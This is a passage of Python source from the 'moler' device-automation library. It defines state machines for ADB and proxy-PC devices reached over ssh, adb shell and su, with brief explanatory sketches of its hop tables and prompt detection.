COMMAND_KWARGS = {
"options": "",
"zip_file": "test.zip",
"file_name": "test.txt",
}
```
#### File: moler/moler/connection.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
from moler.abstract_moler_connection import AbstractMolerConnection
import logging
def identity_transformation(data):
"""Use default coder is no encoding/decoding."""
logging.log(logging.WARNING, "identity_transformation from connection.py is deprecated now. Please use"
" abstract_moler_connection.py.")
return data
class Connection(AbstractMolerConnection):
"""Require. Connection API required by ConnectionObservers."""
def __init__(self, *args, **kwargs):
"""
Init the connection.
:param args: parameters for base class.
:param kwargs: parameters for base class.
"""
super(Connection, self).__init__(*args, **kwargs)
self._log(logging.WARNING, "Class Connection is deprecated now. Please use AbstractMolerConnection.")
```
#### File: moler/device/adbremote2.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import logging
from moler.device.textualdevice import TextualDevice
from moler.device.unixlocal import UnixLocal
from moler.device.proxy_pc2 import ProxyPc2, PROXY_PC
from moler.device.unixremote2 import UnixRemote2, UNIX_REMOTE, UNIX_REMOTE_ROOT
from moler.cmd.adb.adb_shell import AdbShell
from moler.helpers import call_base_class_method_with_same_name, mark_to_call_base_class_method_with_same_name
# helper variables to improve readability of state machines
# f.ex. moler.device.textualdevice introduces state TextualDevice.not_connected = "NOT_CONNECTED"
NOT_CONNECTED = TextualDevice.not_connected
CONNECTION_HOPS = TextualDevice.connection_hops
UNIX_LOCAL = UnixLocal.unix_local
UNIX_LOCAL_ROOT = UnixLocal.unix_local_root
ADB_SHELL = "ADB_SHELL"
ADB_SHELL_ROOT = "ADB_SHELL_ROOT"
@call_base_class_method_with_same_name
class AdbRemote2(UnixRemote2):
r"""
AdbRemote device class.
Example of device in yaml configuration file:
- with PROXY_PC and io "terminal":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_HOPS:
UNIX_LOCAL:
PROXY_PC:
execute_command: ssh # default value
command_params:
expected_prompt: proxy_pc_prompt
host: host_ip
login: login
password: password
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
- with PROXY_PC and remote-access-io like "sshshell":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: host_ip
login: login
password: password
CONNECTION_HOPS:
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
-without PROXY_PC and io "terminal":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_HOPS:
UNIX_LOCAL:
UNIX_REMOTE:
execute_command: ssh # default value
command_params:
expected_prompt: unix_remote_prompt
host: host_ip
login: login
password: password
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
-without PROXY_PC and remote-access-io like "sshshell":
ADB_1:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: host_ip
login: login
password: password
CONNECTION_HOPS:
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell # default value
command_params:
serial_number: 'f57e6b7d'
"""
def __init__(self, sm_params, name=None, io_connection=None, io_type=None, variant=None, io_constructor_kwargs=None,
initial_state=None, lazy_cmds_events=False):
"""
Create ADB device communicating over io_connection
:param sm_params: dict with parameters of state machine for device
:param name: name of device
:param io_connection: External-IO connection having embedded moler-connection
:param io_type: type of connection - tcp, udp, ssh, telnet, ...
:param variant: connection implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
(if not given then default one is taken)
:param io_constructor_kwargs: additional parameter into constructor of selected connection type
(if not given then default one is taken)
:param initial_state: name of initial state. State machine tries to enter this state just after creation.
:param lazy_cmds_events: set False to load all commands and events when device is initialized, set True to load
commands and events when they are required for the first time.
"""
initial_state = initial_state if initial_state is not None else ADB_SHELL
super(AdbRemote2, self).__init__(name=name, io_connection=io_connection,
io_type=io_type, variant=variant,
io_constructor_kwargs=io_constructor_kwargs,
sm_params=sm_params, initial_state=initial_state,
lazy_cmds_events=lazy_cmds_events)
@mark_to_call_base_class_method_with_same_name
def _get_default_sm_configuration_with_proxy_pc(self):
config = self._get_default_sm_configuration_for_adbshell()
return config
@mark_to_call_base_class_method_with_same_name
def _get_default_sm_configuration_without_proxy_pc(self):
config = self._get_default_sm_configuration_for_adbshell()
return config
@staticmethod
def _get_default_sm_configuration_for_adbshell():
config = {
CONNECTION_HOPS: {
UNIX_REMOTE: { # from
ADB_SHELL: { # to
"execute_command": "adb_shell",
"command_params": { # with parameters
"target_newline": "\n",
"prompt_from_serial_number": True,
},
"required_command_params": [
"serial_number",
]
},
},
ADB_SHELL: { # from
UNIX_REMOTE: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"expected_prompt": r'remote_user_prompt', # overwritten in _configure_state_machine()
"target_newline": "\n",
"allowed_newline_after_prompt": True,
},
"required_command_params": [
]
},
ADB_SHELL_ROOT: { # to
"execute_command": "su", # using command
"command_params": { # with parameters
"password": "<PASSWORD>", # if su requires passwd and not given in cfg
"expected_prompt": None, # overwritten in _prepare_state_prompts...()
"target_newline": None, # overwritten in _prepare_newline_chars_...()
},
"required_command_params": [
]
},
},
ADB_SHELL_ROOT: { # from
ADB_SHELL: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"expected_prompt": r'adb_prompt', # overwritten in _configure_state_machine()
"target_newline": "\n"
},
"required_command_params": [
]
},
},
}
}
return config
@mark_to_call_base_class_method_with_same_name
def _prepare_transitions_with_proxy_pc(self):
transitions = self._prepare_transitions_for_sshshell()
return transitions
@mark_to_call_base_class_method_with_same_name
def _prepare_transitions_without_proxy_pc(self):
transitions = self._prepare_transitions_for_sshshell()
return transitions
@staticmethod
def _prepare_transitions_for_sshshell():
transitions = {
UNIX_REMOTE: {
ADB_SHELL: {
"action": [
"_execute_command_to_change_state"
],
}
},
ADB_SHELL: {
UNIX_REMOTE: {
"action": [
"_execute_command_to_change_state"
],
},
ADB_SHELL_ROOT: {
"action": [
"_execute_command_to_change_state"
],
}
},
ADB_SHELL_ROOT: {
ADB_SHELL: {
"action": [
"_execute_command_to_change_state"
],
},
},
}
return transitions
@mark_to_call_base_class_method_with_same_name
def _prepare_state_prompts_with_proxy_pc(self):
state_prompts = self._prepare_state_prompts_for_sshshell()
return state_prompts
@mark_to_call_base_class_method_with_same_name
def _prepare_state_prompts_without_proxy_pc(self):
state_prompts = self._prepare_state_prompts_for_sshshell()
return state_prompts
def _prepare_state_prompts_for_sshshell(self):
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
cfg_adb2adbroot = hops_config[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_cmd_params = cfg_ux2adb["command_params"]
adb_shell_prompt = self._get_adb_shell_prompt(adb_shell_cmd_params)
adb_shell_root_prompt = cfg_adb2adbroot["command_params"]["expected_prompt"]
if adb_shell_root_prompt is None:
if adb_shell_prompt.endswith("$"):
adb_shell_root_prompt = adb_shell_prompt[:-1] + "#"
else:
consequence = "Won't be able to detect {} state".format(ADB_SHELL_ROOT)
fix = "Please provide configuration with 'expected_prompt' for {} state".format(ADB_SHELL_ROOT)
self._log(logging.WARNING, "Unknown prompt for {} state. {}. {}.".format(ADB_SHELL_ROOT,
consequence, fix))
adb_shell_root_prompt = "Unknown_adb_root_prompt"
state_prompts = {
ADB_SHELL: adb_shell_prompt,
ADB_SHELL_ROOT: adb_shell_root_prompt,
}
return state_prompts
@property
def _serial_number(self):
"""
Retrieve serial_number based on required parameter of state machine.
:return: serial_number.
"""
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
serial_number = cfg_ux2adb["command_params"]["serial_number"]
return serial_number
def _get_adb_shell_prompt(self, adb_shell_cmd_params):
adb_shell_prompt = None
if 'expected_prompt' in adb_shell_cmd_params:
adb_shell_prompt = adb_shell_cmd_params["expected_prompt"]
if not adb_shell_prompt:
# adb_shell@f57e6b77 $
adb_shell_prompt = AdbShell.re_generated_prompt.format(self._serial_number)
return adb_shell_prompt
@mark_to_call_base_class_method_with_same_name
def _prepare_newline_chars_with_proxy_pc(self):
newline_chars = self._prepare_newline_chars_for_sshshell()
return newline_chars
@mark_to_call_base_class_method_with_same_name
def _prepare_newline_chars_without_proxy_pc(self):
newline_chars = self._prepare_newline_chars_for_sshshell()
return newline_chars
def _prepare_newline_chars_for_sshshell(self):
hops_config = self._configurations[CONNECTION_HOPS]
cfg_ux2adb = hops_config[UNIX_REMOTE][ADB_SHELL]
cfg_adb2adbroot = hops_config[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_newline = cfg_ux2adb["command_params"]["target_newline"]
adb_shell_root_newline = cfg_adb2adbroot["command_params"]["target_newline"]
if adb_shell_root_newline is None:
adb_shell_root_newline = adb_shell_newline # we are on same machine just changing to root
newline_chars = {
ADB_SHELL: adb_shell_newline,
ADB_SHELL_ROOT: adb_shell_root_newline,
}
return newline_chars
@mark_to_call_base_class_method_with_same_name
def _prepare_state_hops_with_proxy_pc(self):
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
UNIX_LOCAL_ROOT: UNIX_LOCAL,
PROXY_PC: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
UNIX_LOCAL: {
UNIX_REMOTE: PROXY_PC,
UNIX_REMOTE_ROOT: PROXY_PC,
ADB_SHELL: PROXY_PC,
ADB_SHELL_ROOT: PROXY_PC,
},
UNIX_LOCAL_ROOT: {
NOT_CONNECTED: UNIX_LOCAL,
PROXY_PC: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
PROXY_PC: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
NOT_CONNECTED: PROXY_PC,
UNIX_LOCAL: PROXY_PC,
UNIX_LOCAL_ROOT: PROXY_PC,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_LOCAL: ADB_SHELL,
UNIX_LOCAL_ROOT: ADB_SHELL,
PROXY_PC: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
else:
state_hops = {
NOT_CONNECTED: {
UNIX_REMOTE: PROXY_PC,
UNIX_REMOTE_ROOT: PROXY_PC,
ADB_SHELL: PROXY_PC,
ADB_SHELL_ROOT: PROXY_PC,
},
PROXY_PC: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
NOT_CONNECTED: PROXY_PC,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
PROXY_PC: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
PROXY_PC: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
return state_hops
@mark_to_call_base_class_method_with_same_name
def _prepare_state_hops_without_proxy_pc(self):
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
UNIX_LOCAL_ROOT: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
UNIX_LOCAL: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_LOCAL_ROOT: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_REMOTE: UNIX_LOCAL,
UNIX_REMOTE_ROOT: UNIX_LOCAL,
ADB_SHELL: UNIX_LOCAL,
ADB_SHELL_ROOT: UNIX_LOCAL,
},
UNIX_REMOTE: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_LOCAL: ADB_SHELL,
UNIX_LOCAL_ROOT: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
else:
state_hops = {
NOT_CONNECTED: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
return state_hops
def _configure_state_machine(self, sm_params):
"""
Configure device State Machine.
:param sm_params: dict with parameters of state machine for device.
:return: Nothing.
"""
super(AdbRemote2, self)._configure_state_machine(sm_params)
self._update_depending_on_adbshell_prompt()
def _update_depending_on_ux_prompt(self):
self._update_ux_root2ux()
self._update_adbshell2ux()
def _update_depending_on_adbshell_prompt(self):
self._update_adbshellroot2adbshell()
def _update_adbshell2ux(self):
hops_cfg = self._configurations[CONNECTION_HOPS]
if UNIX_REMOTE in self._state_prompts:
ux_remote_prompt = self._state_prompts[UNIX_REMOTE]
hops_cfg[ADB_SHELL][UNIX_REMOTE]["command_params"]["expected_prompt"] = ux_remote_prompt
def _update_adbshellroot2adbshell(self):
hops_cfg = self._configurations[CONNECTION_HOPS]
if ADB_SHELL in self._state_prompts:
adb_shell_prompt = self._state_prompts[ADB_SHELL]
hops_cfg[ADB_SHELL_ROOT][ADB_SHELL]["command_params"]["expected_prompt"] = adb_shell_prompt
cfg_adb2adbroot = hops_cfg[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_root_prompt = cfg_adb2adbroot["command_params"]["expected_prompt"]
if adb_shell_root_prompt is None:
if adb_shell_prompt.endswith("$"):
adb_shell_root_prompt = adb_shell_prompt[:-1] + "#"
cfg_adb2adbroot["command_params"]["expected_prompt"] = adb_shell_root_prompt
def _get_packages_for_state(self, state, observer):
"""
Get available packages containing cmds and events for each state.
:param state: device state.
:param observer: observer type, available: cmd, events
:return: available cmds or events for specific device state.
"""
available = super(AdbRemote2, self)._get_packages_for_state(state, observer)
if not available:
if (state == ADB_SHELL) or (state == ADB_SHELL_ROOT):
available = {TextualDevice.cmds: ['moler.cmd.unix'],
TextualDevice.events: ['moler.events.shared']}
if available:
return available[observer]
elif state == UNIX_REMOTE: # this is unix extended with adb commands
if observer == TextualDevice.cmds:
available.append('moler.cmd.adb')
return available
```
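The nested `state_hops` tables above answer one question: to reach target state T from state S, which neighbouring state should the device enter next? Below is a minimal sketch of how such a table can be walked to plan a multi-hop route (an illustration only, assuming plain string state names; this is not the actual moler transition engine):

```python
def plan_route(state_hops, current, target, max_hops=10):
    """Follow a state_hops table until the target becomes a direct transition."""
    origin, route = current, []
    while current != target:
        # If no hop is listed for (current, target), assume a direct transition.
        next_state = state_hops.get(current, {}).get(target, target)
        route.append(next_state)
        current = next_state
        if len(route) > max_hops:
            raise ValueError("no route from {} to {}".format(origin, target))
    return route


# Trimmed-down example table (same shape as the dicts above):
hops = {
    "NOT_CONNECTED": {"ADB_SHELL": "UNIX_REMOTE", "ADB_SHELL_ROOT": "UNIX_REMOTE"},
    "UNIX_REMOTE": {"ADB_SHELL_ROOT": "ADB_SHELL"},
}
print(plan_route(hops, "NOT_CONNECTED", "ADB_SHELL_ROOT"))
# -> ['UNIX_REMOTE', 'ADB_SHELL', 'ADB_SHELL_ROOT']
```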
#### File: moler/device/proxy_pc2.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import six
import abc
import platform
from moler.device.textualdevice import TextualDevice
from moler.device.unixlocal import UnixLocal
try:
from moler.io.raw.terminal import ThreadedTerminal
except ImportError: # ThreadedTerminal won't load on Windows
pass
from moler.events.shared.wait4 import Wait4
# helper variables to improve readability of state machines
# f.ex. moler.device.textualdevice introduces state TextualDevice.not_connected = "NOT_CONNECTED"
NOT_CONNECTED = TextualDevice.not_connected
CONNECTION_HOPS = TextualDevice.connection_hops
UNIX_LOCAL = UnixLocal.unix_local
UNIX_LOCAL_ROOT = UnixLocal.unix_local_root
PROXY_PC = "PROXY_PC"
def want_local_unix_state(io_type=None, io_connection=None):
"""
Check if device is intended to work with local machine or remote ones only.
:return: True for local.
"""
if io_type == "terminal":
return True
if (platform.system() != 'Windows') and isinstance(io_connection, ThreadedTerminal):
return True
else: # all remote-access connections (tcp, udp, telnet, ssh); even connecting to localhost
return False
@six.add_metaclass(abc.ABCMeta)
class ProxyPc2(UnixLocal):
def __init__(self, sm_params, name=None, io_connection=None, io_type=None, variant=None, io_constructor_kwargs=None,
initial_state=None, lazy_cmds_events=False):
"""
Create Unix device communicating over io_connection
:param sm_params: dict with parameters of state machine for device
:param name: name of device
:param io_connection: External-IO connection having embedded moler-connection
:param io_type: type of connection - tcp, udp, ssh, telnet, ...
:param variant: connection implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
(if not given then default one is taken)
:param io_constructor_kwargs: additional parameter into constructor of selected connection type
(if not given then default one is taken)
:param initial_state: name of initial state. State machine tries to enter this state just after creation.
:param lazy_cmds_events: set False to load all commands and events when device is initialized, set True to load
commands and events when they are required for the first time.
"""
self._use_local_unix_state = want_local_unix_state(io_type, io_connection)
base_state = UNIX_LOCAL if self._use_local_unix_state else NOT_CONNECTED
self._use_proxy_pc = self._should_use_proxy_pc(sm_params, PROXY_PC)
base_or_final_state = PROXY_PC if self._use_proxy_pc else base_state
initial_state = initial_state if initial_state is not None else base_or_final_state
super(ProxyPc2, self).__init__(name=name, io_connection=io_connection,
io_type=io_type, variant=variant,
io_constructor_kwargs=io_constructor_kwargs,
sm_params=sm_params, initial_state=initial_state,
lazy_cmds_events=lazy_cmds_events)
self._prompt_detector_timeout = 0.5
self._after_open_prompt_detector = None
self._warn_about_temporary_life_of_class()
def _warn_about_temporary_life_of_class(self):
what = "experimental/temporary implementation of device utilizing sshshell connection"
temporary_classname = self.__class__.__name__
target_classname = temporary_classname[:-1]
merge_info = "It's functionality will be merged"
future_change = "{} into {} device in Moler 2.0.0 and {} will be removed".format(merge_info,
target_classname,
temporary_classname)
warn_msg = "Class {} is an {}. {}.".format(temporary_classname, what, future_change)
self.logger.warning(warn_msg)
def _should_use_proxy_pc(self, sm_params, proxy):
proxy_in_config = self._is_proxy_pc_in_sm_params(sm_params, proxy)
if (not proxy_in_config) and (not self._use_local_unix_state) and (self.__class__.__name__ == 'ProxyPc2'):
return True # ProxyPc is target of connection open
return proxy_in_config
def goto_state(self, state, *args, **kwargs):
"""Goes to specific state."""
if ((state == UNIX_LOCAL) or (state == UNIX_LOCAL_ROOT)) and (not self._use_local_unix_state):
used_io = "{} {}".format(self.io_connection.__class__.__name__, self.io_connection)
msg = "Device {} has no {}/{} states".format(self, UNIX_LOCAL, UNIX_LOCAL_ROOT)
why = "since it uses following io: {}".format(used_io)
fix = 'You need io of type "terminal" to have unix-local states'
err_msg = "{} {}. {}.".format(msg, why, fix)
raise ValueError(err_msg)
super(ProxyPc2, self).goto_state(state=state, *args, **kwargs)
def _get_default_sm_configuration(self):
"""
Create State Machine default configuration.
:return: default sm configuration.
"""
config = {}
if self._use_local_unix_state:
config = super(ProxyPc2, self)._get_default_sm_configuration()
if self._use_proxy_pc:
default_config = self._get_default_sm_configuration_with_proxy_pc()
else:
default_config = self._get_default_sm_configuration_without_proxy_pc()
self._update_dict(config, default_config)
return config
def _get_default_sm_configuration_with_proxy_pc(self):
"""
Return State Machine default configuration with proxy_pc state.
:return: default sm configuration with proxy_pc state.
"""
if self._use_local_unix_state:
config = {
CONNECTION_HOPS: {
UNIX_LOCAL: { # from
PROXY_PC: { # to
"execute_command": "ssh", # using command
"command_params": { # with parameters
"target_newline": "\n"
},
"required_command_params": [
"host",
"login",
"password",
"expected_prompt"
]
},
},
PROXY_PC: { # from
UNIX_LOCAL: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"target_newline": "\n",
"expected_prompt": r'^moler_bash#',
},
"required_command_params": [
]
}
},
}
}
else:
            config = {}  # no config needed; opening the connection jumps directly from NOT_CONNECTED to PROXY_PC
return config
def _get_default_sm_configuration_without_proxy_pc(self):
"""
Return State Machine default configuration without proxy_pc state.
:return: default sm configuration without proxy_pc state.
"""
config = {}
return config
def _prepare_transitions(self):
"""
Prepare transitions to change states.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_transitions()
if self._use_proxy_pc:
transitions = self._prepare_transitions_with_proxy_pc()
else:
transitions = self._prepare_transitions_without_proxy_pc()
self._add_transitions(transitions=transitions)
def _prepare_transitions_with_proxy_pc(self):
"""
Prepare transitions to change states with proxy_pc state.
:return: transitions with proxy_pc state.
"""
if self._use_local_unix_state:
transitions = {
UNIX_LOCAL: {
PROXY_PC: {
"action": [
"_execute_command_to_change_state"
],
}
},
PROXY_PC: {
UNIX_LOCAL: {
"action": [
"_execute_command_to_change_state"
],
},
},
}
else: # directly from NOT_CONNECTED to PROXY_PC
transitions = {
NOT_CONNECTED: {
PROXY_PC: {
"action": [
"_open_connection"
],
}
},
PROXY_PC: {
NOT_CONNECTED: {
"action": [
"_close_connection"
],
},
},
}
return transitions
def _prepare_transitions_without_proxy_pc(self):
"""
Prepare transitions to change states without proxy_pc state.
:return: transitions without proxy_pc state.
"""
transitions = {}
return transitions
def on_connection_made(self, connection):
"""
Execute action when connection made.
:param connection: device connection.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self).on_connection_made(connection)
else:
self._set_state(PROXY_PC)
self._detect_after_open_prompt(self._set_after_open_prompt)
def on_connection_lost(self, connection):
"""
Execute action when connection lost.
:param connection: device connection.
:return: Nothing.
"""
self._set_state(NOT_CONNECTED)
def _detect_after_open_prompt(self, set_callback):
self._after_open_prompt_detector = Wait4(detect_patterns=[r'^(.+)echo DETECTING PROMPT'],
connection=self.io_connection.moler_connection,
till_occurs_times=1)
detector = self._after_open_prompt_detector
detector.add_event_occurred_callback(callback=set_callback,
callback_params={"event": detector})
self.io_connection.moler_connection.sendline("echo DETECTING PROMPT")
self._after_open_prompt_detector.start(timeout=self._prompt_detector_timeout)
def _set_after_open_prompt(self, event):
occurrence = event.get_last_occurrence()
prompt = occurrence['groups'][0]
state = self._get_current_state()
with self._state_prompts_lock:
self._state_prompts[state] = prompt.rstrip()
def _prepare_state_prompts(self):
"""
Prepare textual prompt for each state.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_state_prompts()
if self._use_proxy_pc:
state_prompts = self._prepare_state_prompts_with_proxy_pc()
else:
state_prompts = self._prepare_state_prompts_without_proxy_pc()
self._update_dict(self._state_prompts, state_prompts)
def _prepare_state_prompts_with_proxy_pc(self):
"""
Prepare textual prompt for each state for State Machine with proxy_pc state.
:return: textual prompt for each state with proxy_pc state.
"""
state_prompts = {}
if self._use_local_unix_state:
state_prompts = {
PROXY_PC:
self._configurations[CONNECTION_HOPS][UNIX_LOCAL][PROXY_PC]["command_params"]["expected_prompt"],
UNIX_LOCAL:
self._configurations[CONNECTION_HOPS][PROXY_PC][UNIX_LOCAL]["command_params"]["expected_prompt"],
}
# else detects prompt after establishing connection: _detect_after_open_prompt() & _set_after_open_prompt()
return state_prompts
def _prepare_state_prompts_without_proxy_pc(self):
"""
Prepare textual prompt for each state for State Machine without proxy_pc state.
:return: textual prompt for each state without proxy_pc state.
"""
state_prompts = {}
return state_prompts
def _prepare_newline_chars(self):
"""
Prepare newline char for each state.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_newline_chars()
if self._use_proxy_pc:
newline_chars = self._prepare_newline_chars_with_proxy_pc()
else:
newline_chars = self._prepare_newline_chars_without_proxy_pc()
self._update_dict(self._newline_chars, newline_chars)
def _prepare_newline_chars_with_proxy_pc(self):
"""
Prepare newline char for each state for State Machine with proxy_pc state.
:return: newline char for each state with proxy_pc state.
"""
newline_chars = {}
if self._use_local_unix_state:
newline_chars = {
PROXY_PC:
self._configurations[CONNECTION_HOPS][UNIX_LOCAL][PROXY_PC]["command_params"]["target_newline"],
UNIX_LOCAL:
self._configurations[CONNECTION_HOPS][PROXY_PC][UNIX_LOCAL]["command_params"]["target_newline"],
}
return newline_chars
def _prepare_newline_chars_without_proxy_pc(self):
"""
Prepare newline char for each state for State Machine without proxy_pc state.
:return: newline char for each state without proxy_pc state.
"""
newline_chars = {}
return newline_chars
def _prepare_state_hops(self):
"""
Prepare hops for non direct transitions between states.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_state_hops()
if self._use_proxy_pc:
state_hops = self._prepare_state_hops_with_proxy_pc()
else:
state_hops = self._prepare_state_hops_without_proxy_pc()
self._update_dict(self._state_hops, state_hops)
def _prepare_state_hops_with_proxy_pc(self):
"""
Prepare non direct transitions for each state for State Machine with proxy_pc state.
:return: non direct transitions for each state with proxy_pc state.
"""
state_hops = {}
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
PROXY_PC: UNIX_LOCAL,
},
UNIX_LOCAL_ROOT: {
PROXY_PC: UNIX_LOCAL,
},
PROXY_PC: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
},
}
return state_hops
def _prepare_state_hops_without_proxy_pc(self):
"""
Prepare non direct transitions for each state for State Machine without proxy_pc state.
:return: non direct transitions for each state without proxy_pc state.
"""
state_hops = {}
return state_hops
def _get_packages_for_state(self, state, observer):
"""
        Get available packages containing cmds and events for each state.
:param state: device state.
:param observer: observer type, available: cmd, events
:return: available cmds or events for specific device state.
"""
available = []
if self._use_local_unix_state:
available = super(ProxyPc2, self)._get_packages_for_state(state, observer)
if not available:
if state == PROXY_PC:
available = {TextualDevice.cmds: ['moler.cmd.unix'],
TextualDevice.events: ['moler.events.shared', 'moler.events.unix']}
if available:
return available[observer]
return available
```
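When no local unix state is used, `on_connection_made()` above cannot know the remote prompt up front, so `_detect_after_open_prompt()` sends `echo DETECTING PROMPT` and lets a `Wait4` event capture whatever the shell printed in front of the echoed command. Below is a standalone sketch of just that pattern-matching idea (no moler objects involved; the helper is illustrative, not part of the library):

```python
import re

PROMPT_PROBE = "echo DETECTING PROMPT"
# Same idea as the Wait4 pattern above: whatever precedes the echoed probe
# command on the line is treated as the shell prompt.
_probe_echo = re.compile(r'^(.+)' + re.escape(PROMPT_PROBE))


def extract_prompt(line):
    """Return the detected prompt, or None if the line is not the echoed probe."""
    match = _probe_echo.search(line)
    return match.group(1).rstrip() if match else None


print(extract_prompt("user@proxy:~$ echo DETECTING PROMPT"))  # -> 'user@proxy:~$'
print(extract_prompt("DETECTING PROMPT"))                     # -> None (plain command output)
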